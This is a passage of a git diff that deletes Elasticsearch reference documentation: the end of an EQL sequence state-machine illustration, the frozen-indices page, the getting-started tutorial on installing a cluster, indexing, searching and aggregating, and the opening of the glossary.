-// -// +-----------------------"elkbee"-----------------------+ -// | +-----------+ +-----------+ +------------+ | -// | | State A | | State B | | Complete | | -// | +-----------+ +-----------+ +------------+ | -// | | | | | | | | -// | +-----------+ +-----------+ +------------+ | -// +------------------------------------------------------+ - -{ "index" : { "_id": "4" } } -{ "user": { "name": "root" }, "process": { "name": "bash" }, ...} -// Sequence [2] moves out of state A for "root". -// State B for "root" now contains [2, 4]. -// State A for "root" is empty. -// -// +------------------------"root"------------------------+ -// | +-----------+ +-----------+ +------------+ | -// | | State A | | State B | | Complete | | -// | +-----------+ --> +-----------+ +------------+ | -// | | | | [2, 4] | | | | -// | +-----------+ +-----------+ +------------+ | -// +------------------------------------------------------+ - -{ "index" : { "_id": "5" } } -{ "user": { "name": "root" }, "process": { "name": "bash" }, ...} -// Nothing happens. State A is empty for "root". -// -// +------------------------"root"------------------------+ -// | +-----------+ +-----------+ +------------+ | -// | | State A | | State B | | Complete | | -// | +-----------+ +-----------+ +------------+ | -// | | | | [2, 4] | | | | -// | +-----------+ +-----------+ +------------+ | -// +------------------------------------------------------+ - -{ "index" : { "_id": "6" } } -{ "user": { "name": "elkbee" }, "process": { "name": "attrib" }, ...} -// Creates sequence [6] in state A for "elkbee". -// -// +-----------------------"elkbee"-----------------------+ -// | +-----------+ +-----------+ +------------+ | -// | | State A | | State B | | Complete | | -// | +-----------+ +-----------+ +------------+ | -// | | [6] | | | | | | -// | +-----------+ +-----------+ +------------+ | -// +------------------------------------------------------+ - -{ "index" : { "_id": "7" } } -{ "user": { "name": "root" }, "process": { "name": "attrib" }, ...} -// Creates sequence [7] in state A for "root". -// Sequence [2, 4] remains in state B for "root". -// -// +------------------------"root"------------------------+ -// | +-----------+ +-----------+ +------------+ | -// | | State A | | State B | | Complete | | -// | +-----------+ +-----------+ +------------+ | -// | | [7] | | [2, 4] | | | | -// | +-----------+ +-----------+ +------------+ | -// +------------------------------------------------------+ - -{ "index" : { "_id": "8" } } -{ "user": { "name": "elkbee" }, "process": { "name": "bash" }, ...} -// Sequence [6, 8] moves to state B for "elkbee". -// State A for "elkbee" is now empty. -// -// +-----------------------"elkbee"-----------------------+ -// | +-----------+ +-----------+ +------------+ | -// | | State A | | State B | | Complete | | -// | +-----------+ --> +-----------+ +------------+ | -// | | | | [6, 8] | | | | -// | +-----------+ +-----------+ +------------+ | -// +------------------------------------------------------+ - -{ "index" : { "_id": "9" } } -{ "user": { "name": "root" }, "process": { "name": "cat" }, ...} -// Sequence [2, 4, 9] is complete for "root". -// State B for "root" is now empty. -// Sequence [7] remains in state A. 
-// -// +------------------------"root"------------------------+ -// | +-----------+ +-----------+ +------------+ | -// | | State A | | State B | | Complete | | -// | +-----------+ +-----------+ --> +------------+ | -// | | [7] | | | | [2, 4, 9] | -// | +-----------+ +-----------+ +------------+ | -// +------------------------------------------------------+ - -{ "index" : { "_id": "10" } } -{ "user": { "name": "elkbee" }, "process": { "name": "cat" }, ...} -// Sequence [6, 8, 10] is complete for "elkbee". -// State A and B for "elkbee" are now empty. -// -// +-----------------------"elkbee"-----------------------+ -// | +-----------+ +-----------+ +------------+ | -// | | State A | | State B | | Complete | | -// | +-----------+ +-----------+ --> +------------+ | -// | | | | | | [6, 8, 10] | -// | +-----------+ +-----------+ +------------+ | -// +------------------------------------------------------+ - -{ "index" : { "_id": "11" } } -{ "user": { "name": "root" }, "process": { "name": "cat" }, ...} -// Nothing happens. -// The machines for "root" and "elkbee" remain the same. -// -// +------------------------"root"------------------------+ -// | +-----------+ +-----------+ +------------+ | -// | | State A | | State B | | Complete | | -// | +-----------+ +-----------+ +------------+ | -// | | [7] | | | | [2, 4, 9] | -// | +-----------+ +-----------+ +------------+ | -// +------------------------------------------------------+ -// -// +-----------------------"elkbee"-----------------------+ -// | +-----------+ +-----------+ +------------+ | -// | | State A | | State B | | Complete | | -// | +-----------+ +-----------+ +------------+ | -// | | | | | | [6, 8, 10] | -// | +-----------+ +-----------+ +------------+ | -// +------------------------------------------------------+ ----- - -==== diff --git a/docs/reference/frozen-indices.asciidoc b/docs/reference/frozen-indices.asciidoc deleted file mode 100644 index 3922fc18dff..00000000000 --- a/docs/reference/frozen-indices.asciidoc +++ /dev/null @@ -1,110 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[frozen-indices]] -= Frozen indices - -[partintro] --- -{es} indices keep some data structures in memory to allow you to search them -efficiently and to index into them. If you have a lot of indices then the -memory required for these data structures can add up to a significant amount. -For indices that are searched frequently it is better to keep these structures -in memory because it takes time to rebuild them. However, you might access some -of your indices so rarely that you would prefer to release the corresponding -memory and rebuild these data structures on each search. - -For example, if you are using time-based indices to store log messages or time -series data then it is likely that older indices are searched much less often -than the more recent ones. Older indices also receive no indexing requests. -Furthermore, it is usually the case that searches of older indices are for -performing longer-term analyses for which a slower response is acceptable. - -If you have such indices then they are good candidates for becoming _frozen -indices_. {es} builds the transient data structures of each shard of a frozen -index each time that shard is searched, and discards these data structures as -soon as the search is complete. Because {es} does not maintain these transient -data structures in memory, frozen indices consume much less heap than normal -indices. This allows for a much higher disk-to-heap ratio than would otherwise -be possible. 
-
-Searches performed on frozen indices use the small, dedicated,
-<> to control the number of
-concurrent searches that hit frozen shards on each node. This limits the amount
-of extra memory required for the transient data structures corresponding to
-frozen shards, which consequently protects nodes against excessive memory
-consumption.
-
-Frozen indices are read-only: you cannot index into them.
-
-Searches on frozen indices are expected to execute slowly. Frozen indices are
-not intended for high search load. A search of a frozen index may take seconds
-or minutes to complete, even if the same search completed in milliseconds when
-the index was not frozen.
-
-To make a frozen index writable again, use the <>.
-
---
-
-[role="xpack"]
-[testenv="basic"]
-[[best_practices]]
-== Best practices
-
-Because frozen indices provide a much higher disk-to-heap ratio at the expense of search latency, it is advisable to allocate frozen indices to
-dedicated nodes to prevent searches on frozen indices from influencing traffic on low-latency nodes. There is significant overhead in loading
-data structures on demand, which can cause page faults and garbage collections that further slow down query execution.
-
-Because indices that are eligible for freezing are unlikely to change in the future, disk space can be optimized as described in <>.
-
-It's highly recommended to <> your indices prior to freezing to ensure that each shard has only a single
-segment on disk. This not only provides much better compression but also simplifies the data structures needed to service aggregation
-or sorted search requests.
-
-[source,console]
---------------------------------------------------
-POST /my-index-000001/_forcemerge?max_num_segments=1
---------------------------------------------------
-// TEST[setup:my_index]
-
-[role="xpack"]
-[testenv="basic"]
-[[searching_a_frozen_index]]
-== Searching a frozen index
-
-Frozen indices are throttled in order to limit memory consumption per node. The number of concurrently loaded frozen indices per node is
-limited by the number of threads in the <> threadpool, which is `1` by default.
-Search requests are not executed against frozen indices by default, even if a frozen index is named explicitly. This is
-to prevent accidental slowdowns caused by targeting a frozen index by mistake. To include frozen indices, a search request must be executed with
-the query parameter `ignore_throttled=false`.
-
-[source,console]
---------------------------------------------------
-GET /my-index-000001/_search?q=user.id:kimchy&ignore_throttled=false
---------------------------------------------------
-// TEST[setup:my_index]
-
-[role="xpack"]
-[testenv="basic"]
-[[monitoring_frozen_indices]]
-== Monitoring frozen indices
-
-Frozen indices are ordinary indices that use search throttling and a memory-efficient shard implementation. For APIs like the
-<>, frozen indices can be identified by an index's `search.throttled` property (`sth`).
- -[source,console] --------------------------------------------------- -GET /_cat/indices/my-index-000001?v=true&h=i,sth --------------------------------------------------- -// TEST[s/^/PUT my-index-000001\nPOST my-index-000001\/_freeze\n/] - -The response looks like: - -[source,txt] --------------------------------------------------- -i sth -my-index-000001 true --------------------------------------------------- -// TESTRESPONSE[non_json] - diff --git a/docs/reference/getting-started.asciidoc b/docs/reference/getting-started.asciidoc deleted file mode 100755 index 004e6e70f8e..00000000000 --- a/docs/reference/getting-started.asciidoc +++ /dev/null @@ -1,745 +0,0 @@ -[[getting-started]] -= Getting started with {es} - -[partintro] --- -Ready to take {es} for a test drive and see for yourself how you can use the -REST APIs to store, search, and analyze data? - -Step through this getting started tutorial to: - -. Get an {es} cluster up and running -. Index some sample documents -. Search for documents using the {es} query language -. Analyze the results using bucket and metrics aggregations - - -Need more context? - -Check out the <> to learn the lingo and understand the basics of -how {es} works. If you're already familiar with {es} and want to see how it works -with the rest of the stack, you might want to jump to the -{stack-gs}/get-started-elastic-stack.html[Elastic Stack -Tutorial] to see how to set up a system monitoring solution with {es}, {kib}, -{beats}, and {ls}. - -TIP: The fastest way to get started with {es} is to -{ess-trial}[start a free 14-day -trial of {ess}] in the cloud. --- - -[[getting-started-install]] -== Get {es} up and running - -To take {es} for a test drive, you can create a -{ess-trial}[hosted deployment] on -the {ess} or set up a multi-node {es} cluster on your own -Linux, macOS, or Windows machine. - -[discrete] -[[run-elasticsearch-hosted]] -=== Run {es} on Elastic Cloud - -When you create a deployment on the {es} Service, the service provisions -a three-node {es} cluster along with Kibana and APM. - -To create a deployment: - -. Sign up for a {ess-trial}[free trial] -and verify your email address. -. Set a password for your account. -. Click **Create Deployment**. - -Once you've created a deployment, you're ready to <>. - -[discrete] -[[run-elasticsearch-local]] -=== Run {es} locally on Linux, macOS, or Windows - -When you create a deployment on the {ess}, a master node and -two data nodes are provisioned automatically. By installing from the tar or zip -archive, you can start multiple instances of {es} locally to see how a multi-node -cluster behaves. - -To run a three-node {es} cluster locally: - -. 
Download the {es} archive for your OS: -+ -Linux: https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-{version}-linux-x86_64.tar.gz[elasticsearch-{version}-linux-x86_64.tar.gz] -+ -["source","sh",subs="attributes,callouts"] --------------------------------------------------- -curl -L -O https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-{version}-linux-x86_64.tar.gz --------------------------------------------------- -// NOTCONSOLE -+ -macOS: https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-{version}-darwin-x86_64.tar.gz[elasticsearch-{version}-darwin-x86_64.tar.gz] -+ -["source","sh",subs="attributes,callouts"] --------------------------------------------------- -curl -L -O https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-{version}-darwin-x86_64.tar.gz --------------------------------------------------- -// NOTCONSOLE -+ -Windows: -https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-{version}-windows-x86_64.zip[elasticsearch-{version}-windows-x86_64.zip] - -. Extract the archive: -+ -Linux: -+ -["source","sh",subs="attributes,callouts"] --------------------------------------------------- -tar -xvf elasticsearch-{version}-linux-x86_64.tar.gz --------------------------------------------------- -+ -macOS: -+ -["source","sh",subs="attributes,callouts"] --------------------------------------------------- -tar -xvf elasticsearch-{version}-darwin-x86_64.tar.gz --------------------------------------------------- -+ -Windows PowerShell: -+ -["source","powershell",subs="attributes,callouts"] --------------------------------------------------- -Expand-Archive elasticsearch-{version}-windows-x86_64.zip --------------------------------------------------- - -. Start {es} from the `bin` directory: -+ -Linux and macOS: -+ -["source","sh",subs="attributes,callouts"] --------------------------------------------------- -cd elasticsearch-{version}/bin -./elasticsearch --------------------------------------------------- -+ -Windows: -+ -["source","powershell",subs="attributes,callouts"] --------------------------------------------------- -cd elasticsearch-{version}\bin -.\elasticsearch.bat --------------------------------------------------- -+ -You now have a single-node {es} cluster up and running! - -. Start two more instances of {es} so you can see how a typical multi-node -cluster behaves. You need to specify unique data and log paths -for each node. -+ -Linux and macOS: -+ -["source","sh",subs="attributes,callouts"] --------------------------------------------------- -./elasticsearch -Epath.data=data2 -Epath.logs=log2 -./elasticsearch -Epath.data=data3 -Epath.logs=log3 --------------------------------------------------- -+ -Windows: -+ -["source","powershell",subs="attributes,callouts"] --------------------------------------------------- -.\elasticsearch.bat -E path.data=data2 -E path.logs=log2 -.\elasticsearch.bat -E path.data=data3 -E path.logs=log3 --------------------------------------------------- -+ -The additional nodes are assigned unique IDs. Because you're running all three -nodes locally, they automatically join the cluster with the first node. - -. Use the cat health API to verify that your three-node cluster is up running. -The cat APIs return information about your cluster and indices in a -format that's easier to read than raw JSON. -+ -You can interact directly with your cluster by submitting HTTP requests to -the {es} REST API. 
If you have Kibana installed and running, you can also
-open Kibana and submit requests through the Dev Console.
-+
-TIP: You'll want to check out the
-https://www.elastic.co/guide/en/elasticsearch/client/index.html[{es} language
-clients] when you're ready to start using {es} in your own applications.
-+
-[source,console]
---------------------------------------------------
-GET /_cat/health?v=true
---------------------------------------------------
-+
-The response should indicate that the status of the `elasticsearch` cluster
-is `green` and it has three nodes:
-+
-[source,txt]
---------------------------------------------------
-epoch      timestamp cluster       status node.total node.data shards pri relo init unassign pending_tasks max_task_wait_time active_shards_percent
-1565052807 00:53:27  elasticsearch green           3         3      6   3    0    0        0             0                  -                100.0%
---------------------------------------------------
-// TESTRESPONSE[s/1565052807 00:53:27 elasticsearch/\\d+ \\d+:\\d+:\\d+ integTest/]
-// TESTRESPONSE[s/3 3 6 3/\\d+ \\d+ \\d+ \\d+/]
-// TESTRESPONSE[s/0 0 -/0 \\d+ (-|\\d+(\.\\d+)?(micros|ms|s))/]
-// TESTRESPONSE[non_json]
-+
-NOTE: The cluster status will remain yellow if you are only running a single
-instance of {es}. A single-node cluster is fully functional, but data
-cannot be replicated to another node to provide resiliency. Replica shards must
-be available for the cluster status to be green. If the cluster status is red,
-some data is unavailable.
-
-[discrete]
-[[gs-curl]]
-=== Talking to {es} with cURL commands
-
-Most of the examples in this guide enable you to copy the appropriate cURL
-command and submit the request to your local {es} instance from the command line.
-
-A request to Elasticsearch consists of the same parts as any HTTP request:
-
-[source,sh]
---------------------------------------------------
-curl -X<VERB> '<PROTOCOL>://<HOST>:<PORT>/<PATH>?<QUERY_STRING>' -d '<BODY>'
---------------------------------------------------
-// NOTCONSOLE
-
-This example uses the following variables:
-
-`<VERB>`:: The appropriate HTTP method or verb. For example, `GET`, `POST`,
-`PUT`, `HEAD`, or `DELETE`.
-`<PROTOCOL>`:: Either `http` or `https`. Use the latter if you have an HTTPS
-proxy in front of {es} or you use {es} {security-features} to encrypt HTTP
-communications.
-`<HOST>`:: The hostname of any node in your {es} cluster. Alternatively, use
-+localhost+ for a node on your local machine.
-`<PORT>`:: The port running the {es} HTTP service, which defaults to `9200`.
-`<PATH>`:: The API endpoint, which can contain multiple components, such as
-`_cluster/stats` or `_nodes/stats/jvm`.
-`<QUERY_STRING>`:: Any optional query-string parameters. For example, `?pretty`
-will _pretty-print_ the JSON response to make it easier to read.
-`<BODY>`:: A JSON-encoded request body (if necessary).
-
-If the {es} {security-features} are enabled, you must also provide a valid user
-name (and password) that has authority to run the API. For example, use the
-`-u` or `--user` cURL command parameter. For details about which security
-privileges are required to run each API, see <>.
-
-{es} responds to each API request with an HTTP status code like `200 OK`. With
-the exception of `HEAD` requests, it also returns a JSON-encoded response body.
-
-[discrete]
-[[gs-other-install]]
-=== Other installation options
-
-Installing {es} from an archive file enables you to easily install and run
-multiple instances locally so you can try things out.
To run a single instance, -you can run {es} in a Docker container, install {es} using the DEB or RPM -packages on Linux, install using Homebrew on macOS, or install using the MSI -package installer on Windows. See <> for more information. - -[[getting-started-index]] -== Index some documents - -Once you have a cluster up and running, you're ready to index some data. -There are a variety of ingest options for {es}, but in the end they all -do the same thing: put JSON documents into an {es} index. - -You can do this directly with a simple PUT request that specifies -the index you want to add the document, a unique document ID, and one or more -`"field": "value"` pairs in the request body: - -[source,console] --------------------------------------------------- -PUT /customer/_doc/1 -{ - "name": "John Doe" -} --------------------------------------------------- - -This request automatically creates the `customer` index if it doesn't already -exist, adds a new document that has an ID of `1`, and stores and -indexes the `name` field. - -Since this is a new document, the response shows that the result of the -operation was that version 1 of the document was created: - -[source,console-result] --------------------------------------------------- -{ - "_index" : "customer", - "_type" : "_doc", - "_id" : "1", - "_version" : 1, - "result" : "created", - "_shards" : { - "total" : 2, - "successful" : 2, - "failed" : 0 - }, - "_seq_no" : 26, - "_primary_term" : 4 -} --------------------------------------------------- -// TESTRESPONSE[s/"_seq_no" : \d+/"_seq_no" : $body._seq_no/] -// TESTRESPONSE[s/"successful" : \d+/"successful" : $body._shards.successful/] -// TESTRESPONSE[s/"_primary_term" : \d+/"_primary_term" : $body._primary_term/] - - -The new document is available immediately from any node in the cluster. -You can retrieve it with a GET request that specifies its document ID: - -[source,console] --------------------------------------------------- -GET /customer/_doc/1 --------------------------------------------------- -// TEST[continued] - -The response indicates that a document with the specified ID was found -and shows the original source fields that were indexed. - -[source,console-result] --------------------------------------------------- -{ - "_index" : "customer", - "_type" : "_doc", - "_id" : "1", - "_version" : 1, - "_seq_no" : 26, - "_primary_term" : 4, - "found" : true, - "_source" : { - "name": "John Doe" - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_seq_no" : \d+/"_seq_no" : $body._seq_no/ ] -// TESTRESPONSE[s/"_primary_term" : \d+/"_primary_term" : $body._primary_term/] - -[discrete] -[[getting-started-batch-processing]] -=== Indexing documents in bulk - -If you have a lot of documents to index, you can submit them in batches with -the {ref}/docs-bulk.html[bulk API]. Using bulk to batch document -operations is significantly faster than submitting requests individually as it minimizes network roundtrips. - -The optimal batch size depends on a number of factors: the document size and complexity, the indexing and search load, and the resources available to your cluster. A good place to start is with batches of 1,000 to 5,000 documents -and a total payload between 5MB and 15MB. From there, you can experiment -to find the sweet spot. - -To get some data into {es} that you can start searching and analyzing: - -. Download the https://github.com/elastic/elasticsearch/blob/master/docs/src/test/resources/accounts.json?raw=true[`accounts.json`] sample data set. 
The documents in this randomly-generated data set represent user accounts with the following information: -+ -[source,js] --------------------------------------------------- -{ - "account_number": 0, - "balance": 16623, - "firstname": "Bradshaw", - "lastname": "Mckenzie", - "age": 29, - "gender": "F", - "address": "244 Columbus Place", - "employer": "Euron", - "email": "bradshawmckenzie@euron.com", - "city": "Hobucken", - "state": "CO" -} --------------------------------------------------- -// NOTCONSOLE - -. Index the account data into the `bank` index with the following `_bulk` request: -+ -[source,sh] --------------------------------------------------- -curl -H "Content-Type: application/json" -XPOST "localhost:9200/bank/_bulk?pretty&refresh" --data-binary "@accounts.json" -curl "localhost:9200/_cat/indices?v=true" --------------------------------------------------- -// NOTCONSOLE -+ -//// -This replicates the above in a document-testing friendly way but isn't visible -in the docs: -+ -[source,console] --------------------------------------------------- -GET /_cat/indices?v=true --------------------------------------------------- -// TEST[setup:bank] -//// -+ -The response indicates that 1,000 documents were indexed successfully. -+ -[source,txt] --------------------------------------------------- -health status index uuid pri rep docs.count docs.deleted store.size pri.store.size -yellow open bank l7sSYV2cQXmu6_4rJWVIww 5 1 1000 0 128.6kb 128.6kb --------------------------------------------------- -// TESTRESPONSE[s/128.6kb/\\d+(\\.\\d+)?[mk]?b/] -// TESTRESPONSE[s/l7sSYV2cQXmu6_4rJWVIww/.+/ non_json] - -[[getting-started-search]] -== Start searching - -Once you have ingested some data into an {es} index, you can search it -by sending requests to the `_search` endpoint. To access the full suite of -search capabilities, you use the {es} Query DSL to specify the -search criteria in the request body. You specify the name of the index you -want to search in the request URI. - -For example, the following request retrieves all documents in the `bank` -index sorted by account number: - -[source,console] --------------------------------------------------- -GET /bank/_search -{ - "query": { "match_all": {} }, - "sort": [ - { "account_number": "asc" } - ] -} --------------------------------------------------- -// TEST[continued] - -By default, the `hits` section of the response includes the first 10 documents -that match the search criteria: - -[source,console-result] --------------------------------------------------- -{ - "took" : 63, - "timed_out" : false, - "_shards" : { - "total" : 5, - "successful" : 5, - "skipped" : 0, - "failed" : 0 - }, - "hits" : { - "total" : { - "value": 1000, - "relation": "eq" - }, - "max_score" : null, - "hits" : [ { - "_index" : "bank", - "_type" : "_doc", - "_id" : "0", - "sort": [0], - "_score" : null, - "_source" : {"account_number":0,"balance":16623,"firstname":"Bradshaw","lastname":"Mckenzie","age":29,"gender":"F","address":"244 Columbus Place","employer":"Euron","email":"bradshawmckenzie@euron.com","city":"Hobucken","state":"CO"} - }, { - "_index" : "bank", - "_type" : "_doc", - "_id" : "1", - "sort": [1], - "_score" : null, - "_source" : {"account_number":1,"balance":39225,"firstname":"Amber","lastname":"Duke","age":32,"gender":"M","address":"880 Holmes Lane","employer":"Pyrami","email":"amberduke@pyrami.com","city":"Brogan","state":"IL"} - }, ... 
- ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took" : 63/"took" : $body.took/] -// TESTRESPONSE[s/\.\.\./$body.hits.hits.2, $body.hits.hits.3, $body.hits.hits.4, $body.hits.hits.5, $body.hits.hits.6, $body.hits.hits.7, $body.hits.hits.8, $body.hits.hits.9/] - -The response also provides the following information about the search request: - -* `took` – how long it took {es} to run the query, in milliseconds -* `timed_out` – whether or not the search request timed out -* `_shards` – how many shards were searched and a breakdown of how many shards -succeeded, failed, or were skipped. -* `max_score` – the score of the most relevant document found -* `hits.total.value` - how many matching documents were found -* `hits.sort` - the document's sort position (when not sorting by relevance score) -* `hits._score` - the document's relevance score (not applicable when using `match_all`) - -Each search request is self-contained: {es} does not maintain any -state information across requests. To page through the search hits, specify -the `from` and `size` parameters in your request. - -For example, the following request gets hits 10 through 19: - -[source,console] --------------------------------------------------- -GET /bank/_search -{ - "query": { "match_all": {} }, - "sort": [ - { "account_number": "asc" } - ], - "from": 10, - "size": 10 -} --------------------------------------------------- -// TEST[continued] - -Now that you've seen how to submit a basic search request, you can start to -construct queries that are a bit more interesting than `match_all`. - -To search for specific terms within a field, you can use a `match` query. -For example, the following request searches the `address` field to find -customers whose addresses contain `mill` or `lane`: - -[source,console] --------------------------------------------------- -GET /bank/_search -{ - "query": { "match": { "address": "mill lane" } } -} --------------------------------------------------- -// TEST[continued] - -To perform a phrase search rather than matching individual terms, you use -`match_phrase` instead of `match`. For example, the following request only -matches addresses that contain the phrase `mill lane`: - -[source,console] --------------------------------------------------- -GET /bank/_search -{ - "query": { "match_phrase": { "address": "mill lane" } } -} --------------------------------------------------- -// TEST[continued] - -To construct more complex queries, you can use a `bool` query to combine -multiple query criteria. You can designate criteria as required (must match), -desirable (should match), or undesirable (must not match). - -For example, the following request searches the `bank` index for accounts that -belong to customers who are 40 years old, but excludes anyone who lives in -Idaho (ID): - -[source,console] --------------------------------------------------- -GET /bank/_search -{ - "query": { - "bool": { - "must": [ - { "match": { "age": "40" } } - ], - "must_not": [ - { "match": { "state": "ID" } } - ] - } - } -} --------------------------------------------------- -// TEST[continued] - -Each `must`, `should`, and `must_not` element in a Boolean query is referred -to as a query clause. How well a document meets the criteria in each `must` or -`should` clause contributes to the document's _relevance score_. The higher the -score, the better the document matches your search criteria. By default, {es} -returns documents ranked by these relevance scores. 
- -The criteria in a `must_not` clause is treated as a _filter_. It affects whether -or not the document is included in the results, but does not contribute to -how documents are scored. You can also explicitly specify arbitrary filters to -include or exclude documents based on structured data. - -For example, the following request uses a range filter to limit the results to -accounts with a balance between $20,000 and $30,000 (inclusive). - -[source,console] --------------------------------------------------- -GET /bank/_search -{ - "query": { - "bool": { - "must": { "match_all": {} }, - "filter": { - "range": { - "balance": { - "gte": 20000, - "lte": 30000 - } - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -[[getting-started-aggregations]] -== Analyze results with aggregations - -{es} aggregations enable you to get meta-information about your search results -and answer questions like, "How many account holders are in Texas?" or -"What's the average balance of accounts in Tennessee?" You can search -documents, filter hits, and use aggregations to analyze the results all in one -request. - -For example, the following request uses a `terms` aggregation to group -all of the accounts in the `bank` index by state, and returns the ten states -with the most accounts in descending order: - -[source,console] --------------------------------------------------- -GET /bank/_search -{ - "size": 0, - "aggs": { - "group_by_state": { - "terms": { - "field": "state.keyword" - } - } - } -} --------------------------------------------------- -// TEST[continued] - -The `buckets` in the response are the values of the `state` field. The -`doc_count` shows the number of accounts in each state. For example, you -can see that there are 27 accounts in `ID` (Idaho). Because the request -set `size=0`, the response only contains the aggregation results. - -[source,console-result] --------------------------------------------------- -{ - "took": 29, - "timed_out": false, - "_shards": { - "total": 5, - "successful": 5, - "skipped" : 0, - "failed": 0 - }, - "hits" : { - "total" : { - "value": 1000, - "relation": "eq" - }, - "max_score" : null, - "hits" : [ ] - }, - "aggregations" : { - "group_by_state" : { - "doc_count_error_upper_bound": 20, - "sum_other_doc_count": 770, - "buckets" : [ { - "key" : "ID", - "doc_count" : 27 - }, { - "key" : "TX", - "doc_count" : 27 - }, { - "key" : "AL", - "doc_count" : 25 - }, { - "key" : "MD", - "doc_count" : 25 - }, { - "key" : "TN", - "doc_count" : 23 - }, { - "key" : "MA", - "doc_count" : 21 - }, { - "key" : "NC", - "doc_count" : 21 - }, { - "key" : "ND", - "doc_count" : 21 - }, { - "key" : "ME", - "doc_count" : 20 - }, { - "key" : "MO", - "doc_count" : 20 - } ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 29/"took": $body.took/] - - -You can combine aggregations to build more complex summaries of your data. For -example, the following request nests an `avg` aggregation within the previous -`group_by_state` aggregation to calculate the average account balances for -each state. 
- -[source,console] --------------------------------------------------- -GET /bank/_search -{ - "size": 0, - "aggs": { - "group_by_state": { - "terms": { - "field": "state.keyword" - }, - "aggs": { - "average_balance": { - "avg": { - "field": "balance" - } - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -Instead of sorting the results by count, you could sort using the result of -the nested aggregation by specifying the order within the `terms` aggregation: - -[source,console] --------------------------------------------------- -GET /bank/_search -{ - "size": 0, - "aggs": { - "group_by_state": { - "terms": { - "field": "state.keyword", - "order": { - "average_balance": "desc" - } - }, - "aggs": { - "average_balance": { - "avg": { - "field": "balance" - } - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -In addition to basic bucketing and metrics aggregations like these, {es} -provides specialized aggregations for operating on multiple fields and -analyzing particular types of data such as dates, IP addresses, and geo -data. You can also feed the results of individual aggregations into pipeline -aggregations for further analysis. - -The core analysis capabilities provided by aggregations enable advanced -features such as using machine learning to detect anomalies. - -[[getting-started-next-steps]] -== Where to go from here - -Now that you've set up a cluster, indexed some documents, and run some -searches and aggregations, you might want to: - -* {stack-gs}/get-started-elastic-stack.html#install-kibana[Dive in to the Elastic -Stack Tutorial] to install Kibana, Logstash, and Beats and -set up a basic system monitoring solution. - -* {kibana-ref}/add-sample-data.html[Load one of the sample data sets into Kibana] -to see how you can use {es} and Kibana together to visualize your data. - -* Try out one of the Elastic search solutions: -** https://swiftype.com/documentation/site-search/crawler-quick-start[Site Search] -** https://swiftype.com/documentation/app-search/getting-started[App Search] -** https://swiftype.com/documentation/enterprise-search/getting-started[Enterprise Search] diff --git a/docs/reference/glossary.asciidoc b/docs/reference/glossary.asciidoc deleted file mode 100644 index 1d9852720eb..00000000000 --- a/docs/reference/glossary.asciidoc +++ /dev/null @@ -1,574 +0,0 @@ -[glossary] -[[glossary]] -= Glossary of terms - -[glossary] -[[glossary-analysis]] analysis :: -+ --- -// tag::analysis-def[] -Analysis is the process of converting <> to -<>. Depending on which analyzer is used, these phrases: -`FOO BAR`, `Foo-Bar`, `foo,bar` will probably all result in the -terms `foo` and `bar`. These terms are what is actually stored in -the index. - -A full text query (not a <> query) for `FoO:bAR` will -also be analyzed to the terms `foo`,`bar` and will thus match the -terms stored in the index. - -It is this process of analysis (both at index time and at search time) -that allows Elasticsearch to perform full text queries. - -Also see <> and <>. -// end::analysis-def[] --- - -[[glossary-api-key]] API key :: -// tag::api-key-def[] -A unique identifier that you can use for authentication when submitting {es} requests. -When TLS is enabled, all requests must be authenticated using either basic authentication -(user name and password) or an API key. 
-// end::api-key-def[] - - -[[glossary-auto-follow-pattern]] auto-follow pattern :: -// tag::auto-follow-pattern-def[] -An <> that automatically configures new indices as -<> for <>. -For more information, see {ref}/ccr-auto-follow.html[Managing auto follow patterns]. -// end::auto-follow-pattern-def[] - -[[glossary-cluster]] cluster :: -// tag::cluster-def[] -One or more <> that share the -same cluster name. Each cluster has a single master node, which is -chosen automatically by the cluster and can be replaced if it fails. -// end::cluster-def[] - -[[glossary-cold-phase]] cold phase :: -// tag::cold-phase-def[] -The third possible phase in the <>. -In the cold phase, an index is no longer updated and seldom queried. -The information still needs to be searchable, but it’s okay if those queries are slower. -// end::cold-phase-def[] - -[[glossary-cold-tier]] cold tier:: -// tag::cold-tier-def[] -A <> that contains nodes that hold time series data -that is accessed occasionally and not normally updated. -// end::cold-tier-def[] - -[[glossary-component-template]] component template :: -// tag::component-template-def[] -A building block for constructing <> that specifies index -<>, <>, and <>. -// end::component-template-def[] - -[[glossary-content-tier]] content tier:: -// tag::content-tier-def[] -A <> that contains nodes that handle the indexing and query load for -content such as a product catalog. -// end::content-tier-def[] - -[[glossary-ccr]] {ccr} (CCR):: -// tag::ccr-def[] -A feature that enables you to replicate indices in remote clusters to your -local cluster. For more information, see -{ref}/xpack-ccr.html[{ccr-cap}]. -// end::ccr-def[] - -[[glossary-ccs]] {ccs} (CCS):: - -The {ccs} feature enables any node to act as a federated client across -multiple clusters. See <>. - -[[glossary-data-stream]] data stream :: -+ --- -// tag::data-stream-def[] -A named resource used to ingest, search, and manage time series data in {es}. A -data stream's data is stored across multiple hidden, auto-generated -<>. You can automate management of these indices to more -efficiently store large data volumes. - -See {ref}/data-streams.html[Data streams]. -// end::data-stream-def[] --- - -[[glossary-data-tier]] data tier:: -// tag::data-tier-def[] -A collection of nodes with the same data role that typically share the same hardware profile. -See <>, <>, <>, -<>. -// end::data-tier-def[] - -[[glossary-delete-phase]] delete phase :: -// tag::delete-phase-def[] -The last possible phase in the <>. -In the delete phase, an index is no longer needed and can safely be deleted. -// end::delete-phase-def[] - -[[glossary-document]] document :: - -A document is a JSON document which is stored in Elasticsearch. It is -like a row in a table in a relational database. Each document is -stored in an <> and has a <> and an -<>. -+ -A document is a JSON object (also known in other languages as a hash / -hashmap / associative array) which contains zero or more -<>, or key-value pairs. -+ -The original JSON document that is indexed will be stored in the -<>, which is returned by default when -getting or searching for a document. - -[[glossary-field]] field :: - -A <> contains a list of fields, or key-value -pairs. The value can be a simple (scalar) value (eg a string, integer, -date), or a nested structure like an array or an object. A field is -similar to a column in a table in a relational database. 
-+
-The <> for each field has a field _type_ (not to
